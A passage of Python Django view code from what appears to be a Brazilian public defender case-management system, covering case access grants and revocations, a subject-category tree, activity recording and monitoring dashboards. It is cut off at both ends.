[],\r\n 'concessoes': []\r\n }\r\n\r\n acessos = Acesso.objects.select_related(\r\n 'defensor__servidor',\r\n 'solicitado_por__servidor',\r\n 'concedido_por__servidor',\r\n 'revogado_por__servidor',\r\n ).filter(\r\n atendimento=atendimento.at_inicial,\r\n ativo=True\r\n ).order_by(\r\n 'defensor__servidor__nome',\r\n 'id'\r\n )\r\n\r\n for acesso in acessos:\r\n obj = {\r\n 'defensor': {\r\n 'id': acesso.defensor.id,\r\n 'nome': acesso.defensor.nome,\r\n } if acesso.defensor else None,\r\n 'data_solicitacao': Util.date_to_json(acesso.data_solicitacao),\r\n 'solicitado_por': {\r\n 'id': acesso.solicitado_por.id,\r\n 'nome': acesso.solicitado_por.nome,\r\n } if acesso.solicitado_por else None,\r\n 'data_concessao': Util.date_to_json(acesso.data_concessao),\r\n 'concedido_por': {\r\n 'id': acesso.concedido_por.id,\r\n 'nome': acesso.concedido_por.nome,\r\n } if acesso.concedido_por else None,\r\n 'data_revogacao': Util.date_to_json(acesso.data_revogacao),\r\n 'revogado_por': {\r\n 'id': acesso.revogado_por.id,\r\n 'nome': acesso.revogado_por.nome,\r\n } if acesso.revogado_por else None,\r\n 'concedido': True if acesso.data_concessao else False,\r\n }\r\n\r\n resposta['historico'].append(obj)\r\n\r\n if acesso.defensor and not acesso.data_revogacao:\r\n if acesso.data_concessao:\r\n resposta['concessoes'].append(obj)\r\n else:\r\n resposta['solicitacoes'].append(obj)\r\n\r\n return JsonResponse(resposta, safe=False)\r\n\r\n\r\n@login_required\r\ndef conceder_acesso_por_id(request, acesso_id):\r\n defensor = request.user.servidor.defensor if hasattr(request.user.servidor, 'defensor') else None\r\n\r\n if defensor:\r\n Acesso.objects.filter(\r\n id=acesso_id,\r\n data_concessao=None,\r\n data_revogacao=None\r\n ).update(\r\n data_concessao=datetime.now(),\r\n concedido_por=defensor\r\n )\r\n\r\n messages.success(request, u'Acesso ao atendimento concedido!')\r\n\r\n return redirect('atendimento_acesso_visualizar')\r\n\r\n\r\n@login_required\r\ndef conceder_acesso(request, atendimento_numero):\r\n dados = Dados(request.body)\r\n atendimento = Atendimento.objects.get(numero=atendimento_numero)\r\n\r\n if dados['defensor']:\r\n Acesso.conceder(atendimento.at_inicial, dados['defensor'], request.user.servidor.defensor)\r\n else:\r\n Acesso.conceder_publico(atendimento.at_inicial, request.user.servidor.defensor)\r\n\r\n return JsonResponse({'success': True})\r\n\r\n\r\n@login_required\r\ndef revogar_acesso_por_id(request, acesso_id):\r\n defensor = request.user.servidor.defensor if hasattr(request.user.servidor, 'defensor') else None\r\n\r\n if defensor:\r\n Acesso.objects.filter(\r\n id=acesso_id,\r\n data_revogacao=None\r\n ).update(\r\n data_revogacao=datetime.now(),\r\n revogado_por=defensor\r\n )\r\n\r\n messages.success(request, u'Acesso ao atendimento cancelado!')\r\n\r\n return redirect('atendimento_acesso_visualizar')\r\n\r\n\r\n@login_required\r\ndef revogar_acesso(request, atendimento_numero):\r\n dados = Dados(request.body)\r\n atendimento = Atendimento.objects.get(numero=atendimento_numero)\r\n\r\n if dados['defensor']:\r\n Acesso.revogar(atendimento.at_inicial, dados['defensor'], request.user.servidor.defensor)\r\n else:\r\n Acesso.revogar_publico(atendimento.at_inicial, request.user.servidor.defensor)\r\n\r\n return JsonResponse({'success': True})\r\n\r\n\r\n@login_required\r\ndef solicitar_acesso(request, atendimento_numero):\r\n dados = Dados(request.body)\r\n atendimento = Atendimento.objects.get(numero=atendimento_numero)\r\n\r\n Acesso.objects.update_or_create(\r\n atendimento=atendimento.at_inicial,\r\n defensor_id=dados['defensor'],\r\n data_concessao=None,\r\n data_revogacao=None,\r\n defaults={\r\n 'data_solicitacao': datetime.now(),\r\n 'solicitado_por': request.user.servidor.defensor\r\n })\r\n\r\n return JsonResponse({'success': True})\r\n\r\n\r\n@login_required\r\ndef assuntos_get(request):\r\n cache_key = 'assunto.listar:'\r\n cache_data = cache.get(cache_key)\r\n\r\n if not cache_data:\r\n\r\n assuntos = Assunto.objects.filter(ativo=True).order_by(\r\n 'pai', 'ordem'\r\n ).values(\r\n 'id', 'pai', 'ordem', 'titulo', 'descricao', 'codigo'\r\n )\r\n\r\n arr = {}\r\n\r\n # inicializa array\r\n for assunto in assuntos:\r\n arr[assunto['id']] = {\r\n 'id': assunto['id'],\r\n 'titulo': assunto['titulo'],\r\n 'descricao': assunto['descricao'],\r\n 'ordem': assunto['ordem'],\r\n 'pai': assunto['pai'],\r\n 'filhos': []\r\n }\r\n\r\n # vincula filhos aos pais\r\n for assunto in assuntos:\r\n if assunto['pai']:\r\n arr[assunto['pai']]['filhos'].append(str(assunto['id']))\r\n\r\n cache_data = arr\r\n cache.set(cache_key, cache_data)\r\n\r\n return JsonResponse(cache_data, safe=False)\r\n\r\n\r\n@login_required\r\ndef salvar_assunto(request):\r\n data = simplejson.loads(request.body)\r\n\r\n try:\r\n pai = Assunto.objects.get(id=data['pai']['id'])\r\n except ObjectDoesNotExist:\r\n pai = None\r\n\r\n assunto = Assunto(\r\n codigo=data['codigo'],\r\n titulo=data['titulo'],\r\n pai=pai,\r\n cadastrado_por=request.user.servidor,\r\n )\r\n\r\n if pai:\r\n assunto.ordem = pai.filhos.filter(ativo=True).count() + 1\r\n else:\r\n assunto.ordem = Assunto.objects.filter(ativo=True, pai=None).count() + 1\r\n\r\n assunto.save()\r\n\r\n return JsonResponse({'success': True}, safe=False)\r\n\r\n\r\n@login_required\r\ndef excluir_assunto(request):\r\n data = simplejson.loads(request.body)\r\n erro = False\r\n\r\n try:\r\n assunto = Assunto.objects.get(id=data['id'], ativo=True)\r\n except ObjectDoesNotExist:\r\n erro = 'Assunto não existe.'\r\n else:\r\n if assunto.atendimentos.count():\r\n erro = 'Este assunto já esta sendo utilizado em algum atendimento.'\r\n else:\r\n Assunto.objects.filter(id=data['id']).update(ativo=False, excluido_por=request.user.servidor,\r\n data_exclusao=datetime.now())\r\n Assunto.objects.filter(pai=assunto.pai, ordem__gt=assunto.ordem, ativo=True).update(ordem=F('ordem') - 1)\r\n cache.delete('assunto.listar:')\r\n\r\n return JsonResponse({'success': not erro, 'erro': erro}, safe=False)\r\n\r\n\r\n@login_required\r\n@reversion.create_revision(atomic=False)\r\ndef mover_assunto(request):\r\n data = simplejson.loads(request.body)\r\n\r\n try:\r\n assunto = Assunto.objects.get(id=data['id'], ativo=True)\r\n irmao = Assunto.objects.get(pai=assunto.pai, ordem=assunto.ordem + data['posicao'], ativo=True)\r\n except ObjectDoesNotExist:\r\n return JsonResponse({'success': False, 'erro': 'Assunto e/ou irmão não existe(m).'}, safe=False)\r\n\r\n assunto.ordem = assunto.ordem + data['posicao']\r\n assunto.save()\r\n\r\n irmao.ordem = irmao.ordem - data['posicao']\r\n irmao.save()\r\n\r\n msg = 'Assunto \"{0}\" teve ordem {1} alterada para {2} com Irmão \"{3}\"'.format(\r\n assunto.titulo, irmao.ordem,\r\n assunto.ordem,\r\n irmao.titulo\r\n )\r\n reversion.set_user(request.user)\r\n\r\n reversion.set_comment(msg)\r\n\r\n return JsonResponse({'success': True}, safe=False)\r\n\r\n\r\n@login_required\r\ndef vincular_assuntos(request, atendimento_numero):\r\n assuntos = simplejson.loads(request.body)\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n atendimento.assuntos.clear()\r\n for assunto in assuntos:\r\n atendimento.assuntos.add(assunto)\r\n atendimento.save()\r\n return JsonResponse({'success': True, 'assuntos': assuntos})\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.add_assunto')\r\n@permission_required('atendimento.change_assunto')\r\n@permission_required('atendimento.delete_assunto')\r\ndef assuntos_listar(request):\r\n angular = 'AssuntoCtrl'\r\n return render(request=request, template_name=\"atendimento/assunto/listar.html\", context=locals())\r\n\r\n\r\n@login_required\r\n@transaction.atomic\r\ndef salvar_atividade(request, atendimento_numero):\r\n\r\n if request.is_ajax():\r\n dados = simplejson.loads(request.body)\r\n else:\r\n dados = request.POST\r\n\r\n if 'atendimentos' in request.POST:\r\n atendimentos = request.POST.getlist('atendimentos')\r\n else:\r\n atendimentos = [atendimento_numero]\r\n\r\n resposta = None\r\n agora = datetime.now()\r\n\r\n for atendimento_numero in atendimentos:\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n atividade = AtendimentoDefensor(\r\n origem=atendimento,\r\n cadastrado_por=request.user.servidor,\r\n tipo=AtendimentoDefensor.TIPO_ATIVIDADE\r\n )\r\n\r\n if dados.get('finalizar'):\r\n atividade.finalizado_por = request.user.servidor.defensor\r\n atividade.data_finalizado = agora\r\n elif dados.get('reabrir'):\r\n atividade.finalizado_por = None\r\n atividade.data_finalizado = None\r\n atividade.data_atendimento = agora\r\n atendimento.data_atendimento = None\r\n atendimento.atendido_por = None\r\n atendimento.historico = None\r\n\r\n if atendimento.defensoria.nucleo.multidisciplinar:\r\n form = AtividadeForm(dados, instance=atividade)\r\n else:\r\n form = AtividadeDefensorForm(dados, instance=atividade)\r\n\r\n if form.is_valid():\r\n\r\n participantes = []\r\n\r\n # Se multidisciplinar, exije a seleção de pelo menos um participante\r\n if atendimento.defensoria.nucleo.multidisciplinar or atendimento.defensoria.nucleo.diligencia:\r\n\r\n participantes = request.POST.getlist('participantes')\r\n\r\n if not participantes:\r\n resposta = {\r\n 'success': False,\r\n 'message': u'Erro ao salvar a atividade, verifique se há participante selecionado!'}\r\n break\r\n\r\n atividade = form.save()\r\n\r\n # Adiciona participantes na atividade\r\n for servidor_id in participantes:\r\n\r\n # Verifica a partir da lotação dos participantes qual é o seu cargo\r\n atuacao = Atuacao.objects.filter(\r\n Q(defensor__servidor__id=servidor_id) &\r\n Q(data_inicial__lte=atividade.data_atendimento) &\r\n (\r\n Q(data_final=None) |\r\n Q(data_final__gte=atividade.data_atendimento)\r\n )\r\n ).only('cargo__id').first()\r\n\r\n cargo_id = None\r\n\r\n if atuacao:\r\n cargo_id = atuacao.cargo_id\r\n\r\n AtendimentoParticipante.objects.create(\r\n atendimento=atividade,\r\n servidor_id=servidor_id,\r\n cargo_id=cargo_id\r\n )\r\n\r\n # Valida valor do multiplicador de atividade\r\n if atendimento.multiplicador < 1 or not atendimento.qualificacao.multiplica_estatistica:\r\n atendimento.multiplicador = 1\r\n\r\n # Se flag 'finalizar' foi passada, registra a resposta do pedido de apoio como realizada\r\n if dados.get('finalizar'):\r\n\r\n # Copia informações da atividade para a resposta do pedido de apoio\r\n atendimento.historico = atividade.historico\r\n atendimento.atendido_por = request.user.servidor\r\n atendimento.data_atendimento = agora\r\n\r\n # Se for diligência salva o diligente que finalizou a atividade\r\n if atendimento.eh_diligencia:\r\n defensor_id = Defensor.objects.filter(servidor=request.user.servidor).values('id').first()\r\n\r\n if not atendimento.defensor_id == defensor_id['id']:\r\n atendimento.defensor_id = defensor_id['id']\r\n\r\n atendimento.save()\r\n\r\n tarefa = None\r\n resposta = None\r\n\r\n tarefa = atualiza_tarefa_atendimento_origem(\r\n atendimento=atendimento,\r\n resposta=atividade.historico,\r\n servidor=request.user.servidor,\r\n finalizar=True\r\n )\r\n\r\n if 'documentos' in request.POST:\r\n\r\n for documento in request.POST.getlist('documentos'):\r\n\r\n # vincula documento ao atendimento de resposta de apoio\r\n doc_original = AtendimentoDocumento.objects.get(id=documento)\r\n doc_original.id = None\r\n doc_original.atendimento = atendimento\r\n doc_original.save()\r\n\r\n # vincula documento à tarefa (se existir)\r\n if tarefa and resposta:\r\n # vincula arquivo a resposta da tarefa\r\n if doc_original.arquivo:\r\n resposta.documento = doc_original\r\n resposta.save()\r\n # vincula documento online a tarefa\r\n elif doc_original.documento_online:\r\n tarefa.documentos.add(doc_original.documento_online)\r\n\r\n elif dados.get('reabrir'):\r\n\r\n atendimento.save()\r\n\r\n atualiza_tarefa_atendimento_origem(\r\n atendimento=atendimento,\r\n resposta='Solicitação de apoio reaberta',\r\n servidor=request.user.servidor,\r\n reabrir=True\r\n )\r\n\r\n # recupera documento do pedido que também esteja vinculado a um processo\r\n if atendimento.origem:\r\n\r\n documento = atendimento.origem.documento_set.exclude(\r\n documento_online__core_documentos=None\r\n ).first()\r\n\r\n # se existir vinculo com processo, devolve para setor solicitante\r\n if documento:\r\n\r\n processo = documento.documento_online.core_documentos.first().processo\r\n evento = processo.eventos.ativos().tipo_encaminhamento().ordem_decrescente().first()\r\n sucesso, evento = processo.encaminhar(setor_encaminhado=evento.setor_criacao)\r\n\r\n if evento:\r\n\r\n evento.historico = atendimento.historico\r\n evento.save()\r\n\r\n # adiciona documentos da resposta da diligência\r\n for documento in atendimento.documento_set.ativos():\r\n CoreDocumento.objects.create(\r\n processo=processo,\r\n evento=evento,\r\n documento=documento.documento_online,\r\n arquivo=documento.arquivo,\r\n nome=documento.nome,\r\n tipo=CoreTipoDocumento.objects.first(), # todo: tipo padrao\r\n )\r\n\r\n # limpa árvore de atendimento para atualização de dados\r\n if hasattr(atendimento.at_inicial, 'arvore'):\r\n atendimento.at_inicial.arvore.ativo = False\r\n atendimento.at_inicial.arvore.save()\r\n\r\n resposta = {'success': True, 'atividade': Util.object_to_dict(atividade)}\r\n\r\n else:\r\n\r\n resposta = {\r\n 'success': False,\r\n 'message': u'Erro ao salvar a atividade, verifique se todos campos foram preenchidos corretamente!'}\r\n break\r\n\r\n if request.is_ajax():\r\n\r\n resposta = JsonResponse(resposta)\r\n\r\n else:\r\n\r\n if not resposta.get('success'):\r\n messages.error(request, resposta.get('message'))\r\n\r\n if dados.get('next'):\r\n resposta = redirect(dados.get('next'))\r\n else:\r\n resposta = redirect('{}#/atividades'.format(reverse('atendimento_atender', args=[atendimento.numero])))\r\n\r\n return resposta\r\n\r\n\r\n@login_required\r\ndef get_resumo_atividade(request, atendimento_numero):\r\n\r\n atendimento = AtendimentoDefensor.objects.filter(\r\n numero=atendimento_numero,\r\n tipo=Atendimento.TIPO_NUCLEO,\r\n remarcado=None,\r\n ativo=True).first()\r\n\r\n if atendimento:\r\n\r\n if atendimento.realizado:\r\n situacao = 'Realizado'\r\n elif atendimento.atividades.exists():\r\n situacao = 'Em andamento'\r\n elif atendimento.participantes.exists():\r\n situacao = 'Distribuído'\r\n else:\r\n situacao = 'Agendado'\r\n\r\n resposta = {\r\n 'situacao': situacao,\r\n 'atividades': [{\r\n 'data_atendimento': atividade.data_atendimento,\r\n 'qualificacao': atividade.qualificacao.titulo,\r\n 'historico': atividade.historico,\r\n } for atividade in atendimento.atividades.order_by('-data_atendimento')],\r\n 'documentos': [{\r\n 'id': documento.id,\r\n 'nome': documento.nome,\r\n 'arquivo': {\r\n 'url': documento.arquivo.url,\r\n } if documento.arquivo else None,\r\n 'documento_online': {\r\n 'identificador_versao': documento.documento_online.identificador_versao,\r\n 'url': reverse('documentos:validar-detail', kwargs={'slug': documento.documento_online.pk_uuid})\r\n } if documento.documento_online else None,\r\n } for documento in atendimento.documentos.filter(atendimento=atendimento)]\r\n }\r\n\r\n return JsonResponse({'success': True, 'resumo': resposta})\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\nclass VincularDocumentoTarefa(VincularDocumentoBaseView):\r\n model = Tarefa\r\n documents_field_name = 'documentos'\r\n\r\n def vinculate(self):\r\n with transaction.atomic():\r\n super(VincularDocumentoTarefa, self).vinculate() # salvei tarefa\r\n\r\n # colocar try except\r\n try:\r\n atendimento = AtendimentoDefensor.objects.get(id=self.object.atendimento_id)\r\n\r\n self.object = atendimento.defensoria\r\n self.documents_field_name = 'documentos'\r\n try:\r\n # vincula documento em atendimento.models.\r\n super(VincularDocumentoTarefa, self).vinculate()\r\n except Exception as e:\r\n logger.error(e)\r\n\r\n try:\r\n atendimento_documento, criado = AtendimentoDocumento.objects.get_or_create(\r\n atendimento=atendimento.at_inicial,\r\n documento_online=self.document_object,\r\n defaults={\r\n 'cadastrado_por': self.request.user.servidor,\r\n 'nome': self.document_object.assunto\r\n }\r\n )\r\n except Exception as e:\r\n logger.error(e)\r\n\r\n except AtendimentoDefensor.DoesNotExist as e:\r\n logger.error(e)\r\n\r\n\r\nclass AcompanhamentoIndex(TemplateView):\r\n template_name = 'atendimento/acompanhamento/index.html'\r\n\r\n def get_context_data(self, **kwargs):\r\n contexto = super(AcompanhamentoIndex, self).get_context_data(**kwargs)\r\n\r\n if hasattr(self.request.user.servidor, 'defensor'):\r\n defensor = self.request.user.servidor.defensor\r\n atuacoes_lst = defensor.atuacoes().filter(\r\n defensoria__evento=None\r\n ).vigentes()\r\n\r\n else:\r\n\r\n atuacoes_lst = Atuacao.objects.none()\r\n\r\n contexto['atuacoes_lst'] = atuacoes_lst\r\n contexto['Atuacao'] = Atuacao\r\n return contexto\r\n\r\n\r\nclass AcompanhamentoPainel(ListView):\r\n template_name = 'atendimento/acompanhamento/painel.html'\r\n context_object_name = 'atendimentos_lst'\r\n paginate_by = 15\r\n\r\n def get_queryset(self):\r\n\r\n # qs = super(AcompanhamentoIndex, self).get_queryset(request, *args, **kwargs)\r\n painel = self.kwargs.get('painel')\r\n\r\n if painel == 'sem-peca':\r\n atendimentos_lst = self.get_atendimento_sem_peca_queryset()\r\n elif painel == 'peca-digitada':\r\n atendimentos_lst = self.get_atendimento_peca_digitada_queryset()\r\n elif painel == 'peca-assinada':\r\n atendimentos_lst = self.get_atendimento_peca_assinada_queryset()\r\n elif painel == 'peticionado':\r\n atendimentos_lst = self.get_atendimento_peticionado_queryset()\r\n elif painel == \"sem-peca-juridica\":\r\n atendimentos_lst = self.get_atendimento_sem_peca_judicial_queryset()\r\n elif painel == \"peticionado-juridica\":\r\n atendimentos_lst = self.get_atendimento_peticionado_judicial_queryset()\r\n else:\r\n atendimentos_lst = AtendimentoDefensor.objects.none()\r\n\r\n return atendimentos_lst\r\n\r\n def get(self, request, *args, **kwargs):\r\n response_original = super(AcompanhamentoPainel, self).get(request, *args, **kwargs)\r\n\r\n return response_original\r\n\r\n def get_atendimento_queryset(self):\r\n\r\n defensoria = self.kwargs.get('defensoria_id')\r\n\r\n atendimentos = AtendimentoDefensor.objects.select_related(\r\n 'qualificacao__area'\r\n ).annotate(\r\n processos_judiciais=Sum(\r\n Case(\r\n When(\r\n parte__processo__tipo__in=[Processo.TIPO_FISICO, Processo.TIPO_EPROC, Processo.TIPO_PAD],\r\n parte__ativo=True,\r\n then=Value(1)\r\n ),\r\n default=Value(0),\r\n output_field=IntegerField()))\r\n ).filter(\r\n ~Q(data_atendimento=None) &\r\n Q(Q(tipo=Atendimento.TIPO_INICIAL) | Q(tipo=Atendimento.TIPO_RETORNO)) &\r\n Q(ativo=True)\r\n ).order_by(\r\n '-data_atendimento', 'numero'\r\n )\r\n\r\n if defensoria:\r\n atendimentos = atendimentos.filter(\r\n defensoria=defensoria\r\n )\r\n\r\n return atendimentos\r\n\r\n def get_atendimento_sem_peca_queryset(self):\r\n return self.get_atendimento_queryset().annotate(\r\n pecas=Sum(\r\n Case(\r\n When(\r\n ~Q(documento__documento_online=None) &\r\n Q(documento__ativo=True),\r\n then=Value(1)\r\n ),\r\n default=Value(0),\r\n output_field=IntegerField())),\r\n ).filter(\r\n pecas=0,\r\n processos_judiciais=0\r\n )\r\n\r\n def get_atendimento_peca_digitada_queryset(self):\r\n return self.get_atendimento_queryset().filter(\r\n Q(documento__documento_online__esta_assinado=False) &\r\n Q(documento__ativo=True) &\r\n Q(processos_judiciais=0)\r\n ).distinct()\r\n\r\n def get_atendimento_peca_assinada_queryset(self):\r\n return self.get_atendimento_queryset().filter(\r\n Q(documento__documento_online__esta_assinado=True) &\r\n Q(documento__ativo=True) &\r\n Q(processos_judiciais=0)\r\n ).distinct()\r\n\r\n def get_atendimento_peticionado_queryset(self):\r\n return self.get_atendimento_queryset().filter(\r\n processos_judiciais__gt=0\r\n ).distinct()\r\n\r\n def get_atendimento_peticionado_judicial_queryset(self):\r\n start_date = datetime.today() - timedelta(days=30)\r\n end_date = datetime.today()\r\n q = Q(\r\n Q(exibir_no_painel_de_acompanhamento=True) &\r\n Q(parte__processo__data_cadastro__range=[start_date, end_date]) &\r\n Q(processos_judiciais__gt=0)\r\n )\r\n return self.get_atendimento_queryset().filter(q).distinct()\r\n\r\n def get_atendimento_sem_peca_judicial_queryset(self):\r\n q = Q(\r\n Q(exibir_no_painel_de_acompanhamento=True) &\r\n Q(retorno__isnull=True) &\r\n Q(processos_judiciais=0)\r\n )\r\n return self.get_atendimento_queryset().filter(q)\r\n\r\n def get_context_data(self, **kwargs):\r\n contexto = super(AcompanhamentoPainel, self).get_context_data(**kwargs)\r\n tipo_painel_de_acompanhamento = Defensoria.PAINEL_PADRAO\r\n painel = self.kwargs.get('painel')\r\n defensoria_id = self.kwargs.get('defensoria_id')\r\n exibir_botao_ocultar = False\r\n if defensoria_id:\r\n defensoria = Defensoria.objects.get(id=defensoria_id)\r\n tipo_painel_de_acompanhamento = defensoria.tipo_painel_de_acompanhamento\r\n\r\n if tipo_painel_de_acompanhamento == Defensoria.PAINEL_SIMPLIFICADO:\r\n # sem_peca = self.get_atendimento_sem_peca_queryset()\r\n sem_peca_juridica_count = self.get_atendimento_sem_peca_judicial_queryset().count()\r\n # peticionado = self.get_atendimento_peticionado_queryset()\r\n peticionado_juridica_count = self.get_atendimento_peticionado_judicial_queryset().count()\r\n\r\n dados_painel_totais = [\r\n {\r\n 'texto': 'Atendimentos Aguardando Peça Processual Judicial',\r\n 'valor': sem_peca_juridica_count,\r\n 'icone': 'fas fa-clock',\r\n 'cor': 'bg-red',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'sem-peca-juridica'}),\r\n 'selecionado': painel == \"sem-peca-juridica\"\r\n },\r\n {\r\n 'texto': 'Atendimentos com Peça Judiciais Protocolada nos Últimos 30 dias',\r\n 'valor': peticionado_juridica_count,\r\n 'icone': 'fas fa-check-circle',\r\n 'cor': 'bg-blue',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'peticionado-juridica'}),\r\n 'selecionado': painel == \"peticionado-juridica\",\r\n },\r\n ]\r\n else:\r\n # sem_peca = self.get_atendimento_sem_peca_queryset()\r\n sem_peca_count = self.get_atendimento_sem_peca_queryset().count()\r\n\r\n # peca_digitada = self.get_atendimento_peca_digitada_queryset()\r\n peca_digitada_count = self.get_atendimento_peca_digitada_queryset().count()\r\n\r\n # peca_assinada = self.get_atendimento_peca_assinada_queryset()\r\n peca_assinada_count = self.get_atendimento_peca_assinada_queryset().count()\r\n\r\n # peticionado = self.get_atendimento_peticionado_queryset()\r\n peticionado_count = self.get_atendimento_peticionado_queryset().count()\r\n\r\n dados_painel_totais = [\r\n {\r\n 'texto': 'Atendimentos sem Peça',\r\n 'valor': sem_peca_count,\r\n 'icone': 'fas fa-clock',\r\n 'cor': 'bg-red',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'sem-peca'}),\r\n 'selecionado': painel == \"sem-peca\",\r\n },\r\n {\r\n 'texto': 'Peças Digitadas',\r\n 'valor': peca_digitada_count,\r\n 'icone': 'fas fa-file-alt',\r\n 'cor': 'bg-yellow',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'peca-digitada'}),\r\n 'selecionado': painel == \"peca-digitada\",\r\n },\r\n {\r\n 'texto': 'Peças Assinadas',\r\n 'valor': peca_assinada_count,\r\n 'icone': 'fas fa-edit',\r\n 'cor': 'bg-blue',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'peca-assinada'}),\r\n 'selecionado': painel == \"peca-assinada\",\r\n },\r\n {\r\n 'texto': 'Peças Protocoladas',\r\n 'valor': peticionado_count,\r\n 'icone': 'fas fa-check-circle',\r\n 'cor': 'bg-green',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'peticionado'}),\r\n 'selecionado': painel == \"peticionado\",\r\n },\r\n ]\r\n\r\n if painel == 'sem-peca-juridica':\r\n exibir_botao_ocultar = True\r\n\r\n contexto['defensoria'] = defensoria\r\n contexto['painel'] = painel\r\n contexto['exibir_botao_ocultar'] = exibir_botao_ocultar\r\n contexto['totais'] = dados_painel_totais\r\n contexto['Atendimento'] = AtendimentoDefensor\r\n return contexto\r\n\r\n\r\ndef atendimento_indeferimento_form(request, atendimento_numero, classe_tipo, form_id, form_action):\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n classes = CoreClasse.objects.ativos().order_by(\r\n 'nome_norm'\r\n ).distinct(\r\n 'nome_norm'\r\n ).filter(\r\n tipo=classe_tipo\r\n )\r\n\r\n q = Q(ativo=True)\r\n q &= Q(all_atuacoes__tipo=Atuacao.TIPO_TITULARIDADE)\r\n q &= Q(all_atuacoes__ativo=True)\r\n\r\n if classe_tipo == CoreClasse.TIPO_IMPEDIMENTO:\r\n q &= Q(nucleo__indeferimento_pode_receber_impedimento=True)\r\n elif classe_tipo == CoreClasse.TIPO_SUSPEICAO:\r\n q &= Q(nucleo__indeferimento_pode_receber_suspeicao=True)\r\n elif classe_tipo == CoreClasse.TIPO_NEGACAO:\r\n q &= Q(nucleo__indeferimento_pode_receber_negacao=True)\r\n\r\n setores = Defensoria.objects.filter(\r\n q\r\n ).order_by(\r\n 'numero',\r\n 'nome',\r\n 'comarca__nome'\r\n )\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_indeferimento_form.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'classes': classes,\r\n 'setores': setores,\r\n 'form_id': form_id,\r\n 'form_action': form_action,\r\n })\r\n\r\n\r\n@login_required\r\ndef atendimento_indeferimento_impedimento_form(request, atendimento_numero):\r\n from indeferimento.forms import NovoImpedimentoForm\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_indeferimento_form.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'form': NovoImpedimentoForm(atendimento=atendimento),\r\n 'form_id': 'ImpedimentoForm',\r\n 'form_action': reverse('indeferimento:novo_impedimento'),\r\n })\r\n\r\n\r\n@login_required\r\ndef atendimento_indeferimento_suspeicao_form(request, atendimento_numero):\r\n from indeferimento.forms import NovaSuspeicaoForm\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_indeferimento_form.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'form': NovaSuspeicaoForm(atendimento=atendimento),\r\n 'form_id': 'SuspeicaoForm',\r\n 'form_action': reverse('indeferimento:nova_suspeicao'),\r\n })\r\n\r\n\r\n@login_required\r\ndef atendimento_indeferimento_negacao_procedimento_form(request, atendimento_numero):\r\n from indeferimento.forms import NovaNegacaoProcedimentoForm\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_indeferimento_form.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'form': NovaNegacaoProcedimentoForm(atendimento=atendimento),\r\n 'form_id': 'NegacaoProcedimentoForm',\r\n 'form_action': reverse('indeferimento:nova_negacao_procedimento'),\r\n })\r\n\r\n\r\n@login_required\r\ndef atendimento_indeferimento_negacao_form(request, atendimento_numero):\r\n \"\"\"Utilizado para a renderização da modal de Indeferimento dentro da página de Atendimento\"\"\"\r\n\r\n from indeferimento.forms import NovaNegacaoForm\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_indeferimento_form.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'form': NovaNegacaoForm(atendimento=atendimento),\r\n 'form_id': 'NegacaoForm',\r\n 'form_action': reverse('indeferimento:nova_negacao'),\r\n })\r\n\r\n\r\n@login_required\r\ndef atendimento_visualizacao_body(request, atendimento_numero):\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_visualizacao_body.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n })\r\n\r\n\r\n@login_required\r\ndef listar_forma_atendimento_defensor(request):\r\n\r\n formasAtendimento = FormaAtendimento.objects.vigentes_defensor()\r\n\r\n arr = []\r\n for formaAtendimento in formasAtendimento:\r\n arr.append({\r\n 'id': formaAtendimento.id,\r\n 'nome': formaAtendimento.nome,\r\n })\r\n\r\n return JsonResponse(arr, safe=False)\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_atendimento')\r\ndef salvar_oficio(request, atendimento_numero):\r\n if request.is_ajax():\r\n dados = simplejson.loads(request.body)\r\n else:\r\n dados = request.POST\r\n\r\n if dados:\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n anotacao_oficio = AtendimentoDefensor.objects.create(\r\n origem=atendimento,\r\n inicial=atendimento.at_inicial,\r\n cadastrado_por=request.user.servidor,\r\n atendido_por=request.user.servidor,\r\n data_atendimento=datetime.now(),\r\n tipo=AtendimentoDefensor.TIPO_OFICIO,\r\n oficio=True,\r\n detalhes=atendimento.detalhes\r\n )\r\n\r\n if request.FILES:\r\n\r\n documento = 